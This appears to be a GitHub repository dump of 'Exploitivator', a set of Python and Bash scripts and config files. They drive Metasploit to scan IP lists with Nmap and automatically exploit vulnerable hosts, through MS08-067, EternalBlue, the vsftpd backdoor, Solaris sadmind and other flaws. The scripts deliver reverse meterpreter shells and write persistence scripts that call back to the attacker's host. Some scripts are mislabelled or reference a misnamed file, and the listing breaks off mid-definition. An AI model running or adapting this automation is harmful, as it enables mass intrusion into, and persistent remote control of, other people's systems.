├── ExampleCode ├── MSF.pdf ├── auto_exploit.sh ├── msf_08_067.py ├── msf_09_050.py ├── msf_ftp_backd.py ├── msf_postgres_read.py ├── msf_sadmind.py ├── msf_sol_tel.py └── notes.md ├── ReadMe.md ├── exploitivator.cfg ├── exploitivator.py ├── exploitivator_scan.cfg ├── msf_scan.py └── scan_types.cfg /ExampleCode/MSF.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/N1ckDunn/Exploitivator/2dd05e06f34e17d965f239a44920939c7850e0ab/ExampleCode/MSF.pdf -------------------------------------------------------------------------------- /ExampleCode/auto_exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #============================= 4 | # Enumerator 5 | #----------------------------- 6 | # Take IP List file 7 | # and pass the available IPs 8 | # to Metasploit for individual 9 | # exploitation 10 | #============================= 11 | 12 | # Get input file from command line - this should be a list of IP addresses, one address per line 13 | LHOST=$1 14 | IPFILE=$2 15 | SESSION=1 16 | PORT=4444 17 | 18 | while read IP_ADD; do 19 | ((SESSION++)) 20 | ((PORT++)) 21 | echo "[*] Solaris Telnet Auth Bypass - Scanning and attempting to exploit: ${IP_ADD}" 22 | ./msf_sol_tel.py -l $LHOST -r $IP_ADD -p $PORT -s $SESSION 23 | echo $PORT 24 | ((SESSION++)) 25 | ((PORT++)) 26 | echo "[*] MS 08-067 - Scanning and attempting to exploit: ${IP_ADD}" 27 | ./msf_008_067.py -l $LHOST -r $IP_ADD -p $PORT -s $SESSION 28 | 29 | ((SESSION++)) 30 | ((PORT++)) 31 | echo "[*] PostGreSQL Read File - Scanning and attempting to exploit: ${IP_ADD}" 32 | ./msf_postgres_read.py -l $LHOST -r $IP_ADD -p $PORT -s $SESSION 33 | 34 | ((SESSION++)) 35 | ((PORT++)) 36 | echo "[*] VSFTP Backdoor - Scanning and attempting to exploit: ${IP_ADD}" 37 | ./msf_ftp_backd.py -l $LHOST -r $IP_ADD -p $PORT -s $SESSION 38 | done <$IPFILE 39 | -------------------------------------------------------------------------------- /ExampleCode/msf_08_067.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | from pymetasploit3.msfrpc import MsfRpcClient 5 | from time import sleep 6 | import optparse 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | post = open('/tmp/smbpost.rc', 'w') 11 | bat = open('/tmp/ms08067_install.bat', 'w') 12 | 13 | postcomms = f"""getsystem 14 | run persistence -S -U -X -i 10 -p 80 -r {LHOST} 15 | cd c:\ 16 | upload /tmp/ms08067_patch.exe c:\ 17 | upload /tmp/ms08067_install.bat c:\ 18 | execute -f ms08067_install.bat 19 | """ 20 | batcomm = "ms08067_patch.exe /quiet" 21 | post.write(postcomms) 22 | bat.write(batcomm) 23 | post.close() 24 | bat.close() 25 | 26 | # Sets up the chain of rc files to exploit MS08-067, setup persistence, and patch 27 | def sploiter(RHOST, LHOST, LPORT, session): 28 | # Connect to Metasploit RPC using pymetasploit3 29 | client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) #, ssl=True) # Replace 'abc123' with your actual RPC password 30 | 31 | # Create a console 32 | console = client.consoles.console() 33 | 34 | # Exploit MS08-067 35 | commands = f"""use exploit/windows/smb/ms08_067_netapi 36 | set PAYLOAD windows/meterpreter/reverse_tcp 37 | set RHOST {RHOST} 38 | set LHOST {LHOST} 39 | set LPORT {LPORT} 40 | set ExitOnSession false 41 | exploit -z 42 | """ 43 | print(f"[+] Exploiting MS08-067 on: {RHOST}") 44 | console.write(commands) 45 | 46 | # Wait for the exploitation process to finish 47 | while True: 48 | res = console.read() 49 | if res['busy']: 50 | sleep(1) 51 | continue 52 | print(res['data']) # Print the output of the exploitation process 53 | break 54 | 55 | # Run Post-exploit script 56 | #runPost = f"""use post/multi/gather/run_console_rc_file 57 | #set RESOURCE /tmp/smbpost.rc 58 | #set SESSION {session} 59 | #exploit 60 | # """ 61 | #print(f"[+] Running post-exploit script on: {RHOST}") 62 | #console.write(runPost) 63 | 64 | # Wait for the post-exploit process to finish 65 | #while True: 66 | #rres = console.read() 67 | #if rres['busy']: 68 | #sleep(1) 69 | #continue 70 | #print(rres['data']) # Print the output of the post-exploit process 71 | #break 72 | 73 | # Optional: Setup listener for persistent connection (commented out, uncomment if needed) 74 | # sleep(10) 75 | # listen = f"""use exploit/multi/handler 76 | # set PAYLOAD windows/meterpreter/reverse_tcp 77 | # set LPORT 80 78 | # set LHOST {LHOST} 79 | # exploit 80 | # """ 81 | # print(f"[+] Setting up listener on: {LHOST}:80") 82 | # console.write(listen) 83 | # while True: 84 | # lres = console.read() 85 | # if lres['busy']: 86 | # sleep(1) 87 | # continue 88 | # print(lres['data']) # Print the listener's output 89 | # break 90 | 91 | def main(): 92 | parser = optparse.OptionParser(sys.argv[0] + ' -p LPORT -r RHOST -l LHOST') 93 | parser.add_option('-p', dest='LPORT', type='string', help='specify a port to listen on') 94 | parser.add_option('-r', dest='RHOST', type='string', help='Specify a remote host') 95 | parser.add_option('-l', dest='LHOST', type='string', help='Specify a local host') 96 | parser.add_option('-s', dest='session', type='string', help='specify session ID') 97 | (options, args) = parser.parse_args() 98 | 99 | session = options.session 100 | RHOST = options.RHOST 101 | LHOST = options.LHOST 102 | LPORT = options.LPORT 103 | 104 | if (RHOST is None) or (LPORT is None) or (LHOST is None): 105 | print(parser.usage) 106 | sys.exit(0) 107 | 108 | #builder(RHOST, LHOST, LPORT) 109 | sploiter(RHOST, LHOST, LPORT, session) 110 | 111 | if __name__ == "__main__": 112 | main() 113 | -------------------------------------------------------------------------------- /ExampleCode/msf_09_050.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import sys 4 | import argparse 5 | from time import sleep 6 | from pymetasploit3.msfrpc import MsfRpcClient 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | with open('/tmp/smbpost.rc', 'w') as post: 11 | with open('/tmp/ms09050_install.bat', 'w') as bat: 12 | postcomms = f"""getsystem 13 | run persistence -S -U -X -i 10 -p 80 -r {LHOST} 14 | cd c:\ 15 | upload /tmp/ms09050_patch.exe c:\ 16 | upload /tmp/ms09050_install.bat c:\ 17 | execute -f ms09050_install.bat 18 | """ 19 | batcomm = "ms09050_patch.exe /quiet" 20 | # Optionally write to the files if needed 21 | # post.write(postcomms) 22 | # bat.write(batcomm) 23 | 24 | # Sets up the chain of rc files to exploit MS09-050, setup persistence, and patch 25 | def sploiter(RHOST, LHOST, LPORT, session): 26 | # Connect to Metasploit RPC using pymetasploit3 27 | #client = MsfRpcClient('abc123', ssl=True) # Replace 'abc123' with your actual RPC password 28 | client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) # Replace 'abc123' with your actual RPC password 29 | 30 | # Create a new console 31 | console = client.consoles.console() 32 | 33 | # Exploit MS09-050 34 | commands = f"""use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 35 | set PAYLOAD windows/meterpreter/reverse_tcp 36 | set RHOST {RHOST} 37 | set LHOST {LHOST} 38 | set LPORT {LPORT} 39 | set ExitOnSession false 40 | exploit -z 41 | """ 42 | print(f"[+] Exploiting MS09-050 on: {RHOST}") 43 | console.write(commands) 44 | 45 | # Wait for the exploitation process to finish 46 | while True: 47 | res = console.read() 48 | if res['busy']: 49 | sleep(1) 50 | continue 51 | print(res['data']) # Print the console output 52 | break 53 | 54 | # Optional: Run post-exploit script (commented out) 55 | # runPost = f"""use post/multi/gather/run_console_rc_file 56 | # set RESOURCE /tmp/smbpost.rc 57 | # set SESSION {session} 58 | # exploit 59 | # """ 60 | # print(f"[+] Running post-exploit script on: {RHOST}") 61 | # console.write(runPost) 62 | # while True: 63 | # rres = console.read() 64 | # if rres['busy']: 65 | # sleep(1) 66 | # continue 67 | # print(rres['data']) 68 | # break 69 | 70 | # Optional: Setup listener for a persistent connection back over port 80 (commented out) 71 | # sleep(10) 72 | # listen = f"""use exploit/multi/handler 73 | # set PAYLOAD windows/meterpreter/reverse_tcp 74 | # set LPORT 80 75 | # set LHOST {LHOST} 76 | # exploit 77 | # """ 78 | # print(f"[+] Setting up listener on: {LHOST}:80") 79 | # console.write(listen) 80 | # while True: 81 | # lres = console.read() 82 | # if lres['busy']: 83 | # sleep(1) 84 | # continue 85 | # print(lres['data']) 86 | # break 87 | 88 | def main(): 89 | parser = argparse.ArgumentParser(description='MSF Automation Script') 90 | parser.add_argument('-p', dest='LPORT', type=str, 91 | help='Specify a port to listen on') 92 | parser.add_argument('-r', dest='RHOST', type=str, 93 | help='Specify a remote host') 94 | parser.add_argument('-l', dest='LHOST', type=str, 95 | help='Specify a local host') 96 | parser.add_argument('-s', dest='session', type=str, 97 | help='Specify a session ID') 98 | 99 | args = parser.parse_args() 100 | session = args.session 101 | RHOST = args.RHOST 102 | LHOST = args.LHOST 103 | LPORT = args.LPORT 104 | 105 | if RHOST is None or LPORT is None or LHOST is None: 106 | print(parser.print_usage()) 107 | sys.exit(0) 108 | 109 | #builder(RHOST, LHOST, LPORT) 110 | sploiter(RHOST, LHOST, LPORT, session) 111 | 112 | if __name__ == "__main__": 113 | main() 114 | -------------------------------------------------------------------------------- /ExampleCode/msf_ftp_backd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | from pymetasploit3.msfrpc import MsfRpcClient 4 | import optparse 5 | import sys 6 | from time import sleep 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | post = open('/tmp/ftpbackd.rc', 'w') 11 | bat = open('/tmp/ftpbackd_install.sh', 'w') 12 | 13 | postcomms = f"""getsystem 14 | run persistence -S -U -X -i 10 -p 80 -r {LHOST} 15 | cd / 16 | upload /tmp/ftpbackd_install.sh /tmp 17 | execute -f ftpbackd_install.sh 18 | """ 19 | batcomm = "ftpbackd_install.sh /quiet" 20 | # post.write(postcomms); bat.write(batcomm) # Uncomment to actually write to the files 21 | post.close() 22 | bat.close() 23 | 24 | # Sets up the chain of rc files to exploit Solaris telnet bypass, setup persistence, etc. 25 | def sploiter(RHOST, LHOST, LPORT, session): 26 | # Connect to Metasploit RPC 27 | #client = MsfRpcClient('abc123', ssl=True) # Replace with actual password if needed 28 | client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) # Replace with actual password if needed 29 | 30 | # Create a console 31 | console = client.consoles.console() 32 | 33 | # Exploit Telnet Bypass 34 | commands = f"""use exploit/unix/ftp/vsftpd_234_backdoor 35 | set PAYLOAD cmd/unix/interact 36 | set RHOST {RHOST} 37 | exploit -z 38 | """ 39 | print(f"[+] Exploiting VSFTPD Backdoor on: {RHOST}") 40 | console.write(commands) 41 | 42 | # Read the console output 43 | while True: 44 | res = console.read() 45 | if res['busy']: 46 | sleep(1) 47 | continue 48 | print(res['data']) # Print command output 49 | break 50 | 51 | # Example of running a post-exploit script (commented out, uncomment if needed) 52 | # post_exploit = f"""use post/multi/gather/run_console_rc_file 53 | # set RESOURCE /tmp/sadpost.rc 54 | # set SESSION {session} 55 | # exploit 56 | # """ 57 | # console.write(post_exploit) 58 | # sleep(5) 59 | # print(console.read()['data']) 60 | 61 | # Setting up a listener for a persistent connection back over port 80 (commented out) 62 | # listener = f"""use exploit/multi/handler 63 | # set PAYLOAD windows/meterpreter/reverse_tcp 64 | # set LPORT 80 65 | # set LHOST {LHOST} 66 | # exploit 67 | # """ 68 | # console.write(listener) 69 | # sleep(5) 70 | # print(console.read()['data']) 71 | 72 | def main(): 73 | parser = optparse.OptionParser(sys.argv[0] + 74 | ' -p LPORT -r RHOST -l LHOST') 75 | parser.add_option('-p', dest='LPORT', type='string', 76 | help='Specify a port to listen on') 77 | parser.add_option('-r', dest='RHOST', type='string', 78 | help='Specify a remote host') 79 | parser.add_option('-l', dest='LHOST', type='string', 80 | help='Specify a local host') 81 | parser.add_option('-s', dest='session', type='string', 82 | help='Specify a session ID') 83 | (options, args) = parser.parse_args() 84 | 85 | RHOST = options.RHOST 86 | LHOST = options.LHOST 87 | LPORT = options.LPORT 88 | session = options.session 89 | 90 | if RHOST is None or LPORT is None or LHOST is None: 91 | print(parser.usage) 92 | sys.exit(0) 93 | 94 | builder(RHOST, LHOST, LPORT) 95 | sploiter(RHOST, LHOST, LPORT, session) 96 | 97 | if __name__ == "__main__": 98 | main() 99 | -------------------------------------------------------------------------------- /ExampleCode/msf_postgres_read.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import sys 4 | import argparse 5 | from time import sleep 6 | from pymetasploit3.msfrpc import MsfRpcClient 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | # No need for this in the current exploit 11 | with open('/tmp/smbpost.rc', 'w') as post: 12 | with open('/tmp/ms08067_install.bat', 'w') as bat: 13 | postcomms = "" 14 | batcomm = "ms08067_patch.exe /quiet" 15 | # If needed, write these to the files 16 | # post.write(postcomms) 17 | # bat.write(batcomm) 18 | 19 | # Sets up the chain of rc files to exploit MS08-067, setup persistence, and patch 20 | def sploiter(RHOST, LHOST, LPORT, session): 21 | # Connect to Metasploit RPC using pymetasploit3 22 | #client = MsfRpcClient('abc123', ssl=True) # Replace 'abc123' with your actual RPC password 23 | client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) # Replace with actual password if needed 24 | 25 | # Create a console 26 | console = client.consoles.console() 27 | 28 | # Exploit PostgreSQL Read File vulnerability 29 | commands = f"""use auxiliary/admin/postgres/postgres_readfile 30 | set PAYLOAD windows/meterpreter/bind_tcp 31 | set RHOST {RHOST} 32 | set LHOST {LHOST} 33 | set RPORT 5432 34 | set ExitOnSession false 35 | exploit -z 36 | """ 37 | print(f"[+] Exploiting PostgreSQL Read File on: {RHOST}") 38 | console.write(commands) 39 | 40 | # Wait for the exploitation process to finish 41 | while True: 42 | res = console.read() 43 | if res['busy']: 44 | sleep(1) 45 | continue 46 | print(res['data']) # Print the console output 47 | break 48 | 49 | # Optional: Run post-exploit script (commented out in original) 50 | # runPost = f"""use post/multi/gather/run_console_rc_file 51 | # set RESOURCE /tmp/smbpost.rc 52 | # set SESSION {session} 53 | # exploit 54 | # """ 55 | # print(f"[+] Running post-exploit script on: {RHOST}") 56 | # console.write(runPost) 57 | # while True: 58 | # rres = console.read() 59 | # if rres['busy']: 60 | # sleep(1) 61 | # continue 62 | # print(rres['data']) 63 | # break 64 | 65 | # Optional: Setup Listener for persistent connection (commented out in original) 66 | # sleep(10) 67 | # listen = f"""use exploit/multi/handler 68 | # set PAYLOAD windows/meterpreter/reverse_tcp 69 | # set LPORT 80 70 | # set LHOST {LHOST} 71 | # exploit 72 | # """ 73 | # print(f"[+] Setting up listener on: {LHOST}:80") 74 | # console.write(listen) 75 | # while True: 76 | # lres = console.read() 77 | # if lres['busy']: 78 | # sleep(1) 79 | # continue 80 | # print(lres['data']) 81 | # break 82 | 83 | def main(): 84 | parser = argparse.ArgumentParser(description='MSF Automation Script') 85 | parser.add_argument('-p', dest='LPORT', type=str, help='Specify a port to listen on') 86 | parser.add_argument('-r', dest='RHOST', type=str, help='Specify a remote host') 87 | parser.add_argument('-l', dest='LHOST', type=str, help='Specify a local host') 88 | parser.add_argument('-s', dest='session', type=str, help='Specify session ID') 89 | 90 | args = parser.parse_args() 91 | session = args.session 92 | RHOST = args.RHOST 93 | LHOST = args.LHOST 94 | LPORT = args.LPORT 95 | 96 | if RHOST is None or LPORT is None or LHOST is None: 97 | print(parser.print_usage()) 98 | sys.exit(0) 99 | 100 | builder(RHOST, LHOST, LPORT) 101 | sploiter(RHOST, LHOST, LPORT, session) 102 | 103 | if __name__ == "__main__": 104 | main() 105 | -------------------------------------------------------------------------------- /ExampleCode/msf_sadmind.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | from pymetasploit3.msfrpc import MsfRpcClient 4 | import optparse 5 | import sys 6 | from time import sleep 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | post = open('/tmp/sadpost.rc', 'w') 11 | bat = open('/tmp/sadmind_install.sh', 'w') 12 | 13 | postcomms = f"""getsystem 14 | run persistence -S -U -X -i 10 -p 80 -r {LHOST} 15 | cd / 16 | upload /tmp/sadmind_install.sh /tmp 17 | execute -f sadmind_install.sh 18 | """ 19 | batcomm = "sadmind_install.sh /quiet" 20 | # post.write(postcomms); bat.write(batcomm) # Uncomment to actually write to the files 21 | post.close() 22 | bat.close() 23 | 24 | # Sets up the chain of rc files to exploit Solaris telnet bypass, setup persistence, etc. 25 | def sploiter(RHOST, LHOST, LPORT, session): 26 | # Connect to Metasploit RPC 27 | client = MsfRpcClient('abc123', ssl=True) # Replace with actual password if needed 28 | 29 | # Create a console 30 | console = client.consoles.console() 31 | 32 | # Exploit Telnet Bypass 33 | commands = f"""use exploit/solaris/sunrpc/sadmind_adm_build_path 34 | set PAYLOAD solaris/x86/shell_bind_tcp 35 | set RHOST {RHOST} 36 | set LHOST {LHOST} 37 | set LPORT {LPORT} 38 | set target 1 39 | set ExitOnSession false 40 | exploit -z 41 | """ 42 | print(f"[+] Exploiting Solaris sadmind on: {RHOST}") 43 | console.write(commands) 44 | 45 | # Read the console output 46 | while True: 47 | res = console.read() 48 | if res['busy']: 49 | sleep(1) 50 | continue 51 | print(res['data']) # Print command output 52 | break 53 | 54 | # Example of running a post-exploit script (commented out, uncomment if needed) 55 | # post_exploit = f"""use post/multi/gather/run_console_rc_file 56 | # set RESOURCE /tmp/sadpost.rc 57 | # set SESSION {session} 58 | # exploit 59 | # """ 60 | # console.write(post_exploit) 61 | # sleep(5) 62 | # print(console.read()['data']) 63 | 64 | # Setting up a listener for a persistent connection back over port 80 (commented out) 65 | # listener = f"""use exploit/multi/handler 66 | # set PAYLOAD windows/meterpreter/reverse_tcp 67 | # set LPORT 80 68 | # set LHOST {LHOST} 69 | # exploit 70 | # """ 71 | # console.write(listener) 72 | # sleep(5) 73 | # print(console.read()['data']) 74 | 75 | def main(): 76 | parser = optparse.OptionParser(sys.argv[0] + 77 | ' -p LPORT -r RHOST -l LHOST') 78 | parser.add_option('-p', dest='LPORT', type='string', 79 | help='Specify a port to listen on') 80 | parser.add_option('-r', dest='RHOST', type='string', 81 | help='Specify a remote host') 82 | parser.add_option('-l', dest='LHOST', type='string', 83 | help='Specify a local host') 84 | parser.add_option('-s', dest='session', type='string', 85 | help='Specify a session ID') 86 | (options, args) = parser.parse_args() 87 | 88 | RHOST = options.RHOST 89 | LHOST = options.LHOST 90 | LPORT = options.LPORT 91 | session = options.session 92 | 93 | if RHOST is None or LPORT is None or LHOST is None: 94 | print(parser.usage) 95 | sys.exit(0) 96 | 97 | builder(RHOST, LHOST, LPORT) 98 | sploiter(RHOST, LHOST, LPORT, session) 99 | 100 | if __name__ == "__main__": 101 | main() 102 | -------------------------------------------------------------------------------- /ExampleCode/msf_sol_tel.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import optparse 4 | import sys 5 | from time import sleep 6 | from pymetasploit3.msfrpc import MsfRpcClient 7 | 8 | # Function to create the MSF .rc files 9 | def builder(RHOST, LHOST, LPORT): 10 | with open('/tmp/smbpost.rc', 'w') as post, open('/tmp/soltel_install.sh', 'w') as bat: 11 | postcomms = f"""getsystem 12 | run persistence -S -U -X -i 10 -p 80 -r {LHOST} 13 | cd / 14 | upload /tmp/soltel_install.sh /tmp 15 | execute -f soltel_install.sh 16 | """ 17 | batcomm = "soltel_install.sh /quiet" 18 | #post.write(postcomms); bat.write(batcomm) 19 | 20 | # Sets up the chain of rc files to exploit Solaris telnet bypass, setup persistence, etc. 21 | def sploiter(RHOST, LHOST, LPORT, session): 22 | #client = MsfRpcClient('abc123', ssl=True) 23 | client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) # Replace with actual password if needed 24 | 25 | # Exploit Telnet Bypass 26 | exploit = client.modules.use('exploit', 'solaris/sunrpc/sadmind_adm_build_path') 27 | exploit['RHOSTS'] = RHOST 28 | exploit['LHOST'] = LHOST 29 | exploit['LPORT'] = LPORT 30 | exploit['TARGET'] = 1 31 | payload = client.modules.use('payload', 'solaris/x86/shell_bind_tcp') 32 | exploit.execute(payload=payload) 33 | 34 | print(f"[+] Exploiting Solaris sadmind on: {RHOST}") 35 | 36 | # Wait for the exploit to complete and check for a session 37 | while client.sessions.list == {}: 38 | sleep(5) 39 | 40 | print("[+] Session created!") 41 | 42 | # Run Post-exploit script (commented out, uncomment if needed) 43 | # post_exploit = client.modules.use('post', 'multi/gather/run_console_rc_file') 44 | # post_exploit['SESSION'] = session 45 | # post_exploit['RESOURCE'] = '/tmp/smbpost.rc' 46 | # post_exploit.execute() 47 | 48 | # Setup Listener for persistent connection back over port 80 (commented out, uncomment if needed) 49 | # sleep(10) 50 | # handler = client.modules.use('exploit', 'multi/handler') 51 | # handler['PAYLOAD'] = 'windows/meterpreter/reverse_tcp' 52 | # handler['LHOST'] = LHOST 53 | # handler['LPORT'] = 80 54 | # handler.execute() 55 | # print(f"[+] Setting up listener on: {LHOST}:80") 56 | 57 | def main(): 58 | parser = optparse.OptionParser(sys.argv[0] + 59 | ' -p LPORT -r RHOST -l LHOST') 60 | parser.add_option('-p', dest='LPORT', type='string', 61 | help='Specify a port to listen on') 62 | parser.add_option('-r', dest='RHOST', type='string', 63 | help='Specify a remote host') 64 | parser.add_option('-l', dest='LHOST', type='string', 65 | help='Specify a local host') 66 | parser.add_option('-s', dest='session', type='string', 67 | help='Specify a session ID') 68 | (options, args) = parser.parse_args() 69 | session = options.session 70 | RHOST = options.RHOST 71 | LHOST = options.LHOST 72 | LPORT = options.LPORT 73 | 74 | if RHOST is None or LPORT is None or LHOST is None: 75 | print(parser.usage) 76 | sys.exit(0) 77 | 78 | builder(RHOST, LHOST, LPORT) 79 | sploiter(RHOST, LHOST, LPORT, session) 80 | 81 | if __name__ == "__main__": 82 | main() 83 | -------------------------------------------------------------------------------- /ExampleCode/notes.md: -------------------------------------------------------------------------------- 1 | Example Code 2 | ============ 3 | 4 | Some simple examples to show MSF scripting for a single exploit -------------------------------------------------------------------------------- /ReadMe.md: -------------------------------------------------------------------------------- 1 | Exploitivator 2 | ============= 3 | V2.0 - modified to use Python 3 4 | 5 | Prerequisites 6 | ------------- 7 | This has only been tested on Kali. 8 | 9 | It depends on the pymetasploit3 module for Python, described in detail here: 10 | https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library 11 | 12 | Install the necessary Kali packages and the PostgreSQL gem for Ruby: 13 | 14 | apt-get install postgresql libpq-dev git-core 15 | 16 | gem install pg 17 | 18 | Install current version of the pymetasploit3 Python 3 module: 19 | pip3 install pymetasploit3 20 | 21 | 22 | Usage 23 | ----- 24 | Before running either of the scripts, load msfconsole and start the MSGRPC service. 25 | MSGRPC can be started with msfrpcd in Metasploit as follows: 26 | load msgrpc Pass=abc123 ServerHost=0.0.0.0 ServerPort=55552 27 | 28 | The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt). 29 | 30 | Use MSFScan to run multiple Metasploit scans against a group of target hosts. 31 | Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable. 32 | 33 | Exploitivator 34 | ------------- 35 | Command line usage: 36 | 37 | 38 | Examples: 39 | The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: 40 | ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123 41 | 42 | 43 | MSFScan 44 | ------- 45 | Command line usage: 46 | ./msf_scan.py filename 47 | ./msf_scan.py filename MSF_DB_Username MSF_DB_Password 48 | 49 | Examples: 50 | The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: 51 | ./msf_scan.py hosts.txt msf abc123 52 | 53 | To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username(msf) and the script's default Metasploit Postgres password(abc123): 54 | ./msf_scan.py hosts.txt 55 | 56 | 57 | Config Files 58 | ------------ 59 | Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks. 60 | 61 | MSFScan 62 | ------- 63 | The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans the are to run against the targets. 64 | e.g.: 65 | auxiliary/scanner/dcerpc/endpoint_mapper 66 | auxiliary/scanner/smb/smb_version 67 | auxiliary/scanner/x11/open_x11 68 | auxiliary/scanner/discovery/ipv6_multicast_ping 69 | auxiliary/scanner/discovery/ipv6_neighbor 70 | auxiliary/scanner/smb/smb_login 71 | 72 | 73 | Exploitivator 74 | ------------- 75 | This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). 76 | These use '##' as a separator and have the following formats. 77 | 78 | exploitivator_scan.cfg: 79 | [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used] 80 | 81 | In the above format: 82 | 1) The first section is a label linking the scan to the exploit 83 | 2) The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script 84 | 3) The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output) 85 | 4) The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file 86 | 87 | An example file content is shown below: 88 | SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml 89 | SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml 90 | SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml 91 | SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml 92 | SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml 93 | DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632\/open\/tcp\/\/distccd" 94 | JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099\/open\/tcp\/\/rmi 95 | VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4" 96 | 97 | 98 | exploitivator.cfg: 99 | [Label]##[Metasploit exploit path]##[Optional - Metasploit payload details] 100 | 101 | An example file content is shown below: 102 | SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp 103 | SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp 104 | SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp 105 | SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp 106 | DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby 107 | JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp 108 | VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none 109 | 110 | References 111 | ---------- 112 | 113 | Starting and connecting to MSGRPC: 114 | https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library 115 | 116 | Setting RHOSTS to use a file instead of a range: 117 | http://travisaltman.com/metasploit-set-rhosts-file/ 118 | -------------------------------------------------------------------------------- /exploitivator.cfg: -------------------------------------------------------------------------------- 1 | SMB_06-025##exploit/windows/smb/ms06_025_rasmans_reg##windows/meterpreter/reverse_tcp 2 | SMB_07-029##exploit/windows/dcerpc/ms07_029_msdns_zonename##windows/meterpreter/reverse_tcp 3 | SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/reverse_tcp 4 | SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/reverse_tcp 5 | SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/reverse_tcp 6 | SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/reverse_tcp 7 | DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby 8 | JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp 9 | VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##cmd/unix/interact 10 | Asterisk##exploit/unix/http/freepbx_callmenum##cmd/unix/reverse##set EXTENSION 2000-2001 11 | URTBackDoor##exploit/unix/irc/unreal_ircd_3281_backdoor##cmd/unix/bind_ruby 12 | SambaRCE##exploit/multi/samba/usermap_script##linux/x86/meterpreter/reverse_tcp 13 | -------------------------------------------------------------------------------- /exploitivator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os 4 | import optparse 5 | import sys 6 | import subprocess 7 | import datetime 8 | import time 9 | import requests 10 | 11 | import xml.etree.ElementTree as ET 12 | 13 | from pymetasploit3.msfrpc import MsfRpcClient 14 | from collections import defaultdict 15 | 16 | 17 | # Function to create the MSF .rc files 18 | def builder(rhost, lhost, lport): 19 | post = open('/tmp/smbpost.rc', 'w') 20 | bat = open('/tmp/exploit_install.bat', 'w') 21 | 22 | postcomms = f"""getsystem 23 | run persistence -S -U -X -i 10 -p 80 -r {lhost} 24 | cd c:\ 25 | upload /tmp/exploit_patch.exe c:\ 26 | upload /tmp/exploit_install.bat c:\ 27 | execute -f exploit_install.bat 28 | """ 29 | 30 | batcomm = "exploit_patch.exe /quiet" 31 | post.write(postcomms) 32 | bat.write(batcomm) 33 | post.close() 34 | bat.close() 35 | 36 | 37 | def 